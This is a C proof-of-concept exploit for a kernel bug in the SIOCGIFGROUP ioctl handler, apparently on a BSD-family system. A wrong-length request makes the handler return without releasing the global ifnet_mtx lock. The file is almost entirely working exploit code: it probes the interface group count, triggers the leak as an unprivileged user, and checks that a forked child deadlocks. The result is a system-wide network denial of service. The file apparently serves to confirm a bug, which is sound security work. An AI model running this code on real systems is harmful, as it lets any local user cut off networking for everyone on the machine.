/*
 * DF-0272 — SIOCGIFGROUP ifnet_mtx leak PoC (unprivileged DoS)
 *
 * Triggers the missing-ifnet_unlock-on-error-path bug in ifioctl()'s
 * SIOCGIFGROUP handler at sys/net/if.c:2403-2407.
 *
 * ifnet_lock() is taken at sys/net/if.c:2029; the SIOCGIFGROUP case
 * unconditionally does `return (error)` from if_getgroups() instead of
 * `break`, bypassing ifnet_unlock() at line 2450. Once leaked, the
 * global `ifnet_mtx` (sys/net/if.c:195, MTX_INITIALIZER("ifnet")) is
 * held forever by the calling thread; every subsequent ifnet_lock()
 * attempt by any thread blocks forever -> system-wide network DoS.
 *
 * Privilege model: SIOCGIFGROUP has NO caps_priv_check (unlike
 * SIOCAIFGROUP/SIOCDIFGROUP at lines 2387/2396 which need
 * SYSCAP_NONET_IFCONFIG, and SIOCSIFDESCR at line 2101 which needs
 * SYSCAP_RESTRICTEDROOT). So ANY local user with a UDP socket can
 * trigger the leak.
 *
 * Trigger condition: if_getgroups() returns EINVAL when
 * ifgr->ifgr_len is non-zero and != the real per-iface group count
 * (sys/net/if.c:1281-1283). We probe with len=0 to learn the real
 * count, then send len=count+1 to force EINVAL -> ifnet_mtx leaked.
 *
 * After the leak, a second network operation that needs ifnet_lock()
 * blocks forever. We fork a child, give it SIGALRM after a few seconds
 * to prove it actually blocked (vs. returning quickly), then report.
 */

#include <sys/param.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <net/if.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>

static const char *IFNAME = "lo0";

static int
do_getgroups(int s, u_int len, u_int *out_len)
{
	struct ifgroupreq ifgr;
	memset(&ifgr, 0, sizeof(ifgr));
	strlcpy(ifgr.ifgr_name, IFNAME, IFNAMSIZ);
	ifgr.ifgr_len = len;
	int rc = ioctl(s, SIOCGIFGROUP, &ifgr);
	if (rc == 0 && out_len)
		*out_len = ifgr.ifgr_len;
	return rc;
}

static volatile sig_atomic_t alarm_fired = 0;
static void on_alrm(int sig) { (void)sig; alarm_fired = 1; }

int
main(void)
{
	int s, rc;
	u_int real_len = 0;

	s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s < 0) { perror("socket"); return 2; }

	/* Step 1: probe real group length (len=0 path returns 0 and fills len). */
	rc = do_getgroups(s, 0, &real_len);
	if (rc < 0) {
		fprintf(stderr, "[!] probe ioctl failed: %s (errno=%d)\n",
		        strerror(errno), errno);
		fprintf(stderr, "[!] trying len=1 blindly to force EINVAL\n");
		real_len = 0; /* unknown; len=1 almost certainly won't match */
	} else {
		fprintf(stderr, "[*] %s real group_len=%u\n", IFNAME, real_len);
	}

	/* Step 2: trigger the EINVAL path with a deliberately-wrong length.
	 * The handler does `return (error)` instead of `break`, leaking
	 * the global ifnet_mtx acquired at sys/net/if.c:2029. */
	u_int bad_len = (real_len == 0) ? 1 : real_len + 1;
	errno = 0;
	rc = do_getgroups(s, bad_len, NULL);
	fprintf(stderr,
	    "[+] trigger ioctl (len=%u) rc=%d errno=%d (%s)\n",
	    bad_len, rc, errno, rc ? strerror(errno) : "no error");
	if (rc == 0) {
		fprintf(stderr,
		    "[?] trigger did NOT error — group count changed? retrying with len=99\n");
		do_getgroups(s, 99, NULL);
	}
	close(s);

	/* Step 3: ifnet_mtx is now permanently held. Any subsequent call
	 * into ifioctl() that reaches ifnet_lock() blocks forever. We
	 * demonstrate this by forking a child that issues another
	 * SIOCGIFGROUP on a fresh socket; SIGALRM after 5 s kills it and
	 * we observe that it was still blocked (D-state). */
	fflush(stderr);
	pid_t pid = fork();
	if (pid < 0) { perror("fork"); return 2; }
	if (pid == 0) {
		/* child */
		struct sigaction sa;
		memset(&sa, 0, sizeof(sa));
		sa.sa_handler = on_alrm;
		sigaction(SIGALRM, &sa, NULL);
		alarm(5);
		int s2 = socket(AF_INET, SOCK_DGRAM, 0);
		if (s2 < 0) _exit(2);
		/* this should NEVER return on a vulnerable kernel */
		do_getgroups(s2, 0, NULL);
		close(s2);
		_exit(alarm_fired ? 0 : 1); /* 0 = alarm fired (was blocked) */
	}

	int status = 0;
	pid_t w;
	/* Wait up to 8 seconds; if the child is still alive after alarm (5s),
	 * it means ioctl returned but alarm caught it OR the child is
	 * blocked. We'll measure wall-clock time to disambiguate. */
	sleep(6);
	w = waitpid(pid, &status, WNOHANG);
	if (w == 0) {
		/* child still running — likely blocked in ioctl */
		fprintf(stderr,
		    "[!] child PID %d still alive after 6 s — DEADLOCK CONFIRMED\n",
		    (int)pid);
		kill(pid, SIGKILL);
		waitpid(pid, &status, 0);
		printf("RESULT: DEADLOCK_CONFIRMED child_blocked_after_alarm\n");
		return 0;
	} else if (WIFEXITED(status)) {
		int code = WEXITSTATUS(status);
		if (code == 0) {
			/* alarm fired before ioctl returned => blocked */
			printf("RESULT: DEADLOCK_CONFIRMED alarm_fired_during_ioctl\n");
			return 0;
		}
		fprintf(stderr,
		    "[*] child exited normally (code=%d) — second ioctl returned, NO deadlock\n",
		    code);
		printf("RESULT: NO_DEADLOCK\n");
		return 1;
	}
	fprintf(stderr, "[?] child status=0x%x\n", status);
	printf("RESULT: INCONCLUSIVE\n");
	return 2;
}
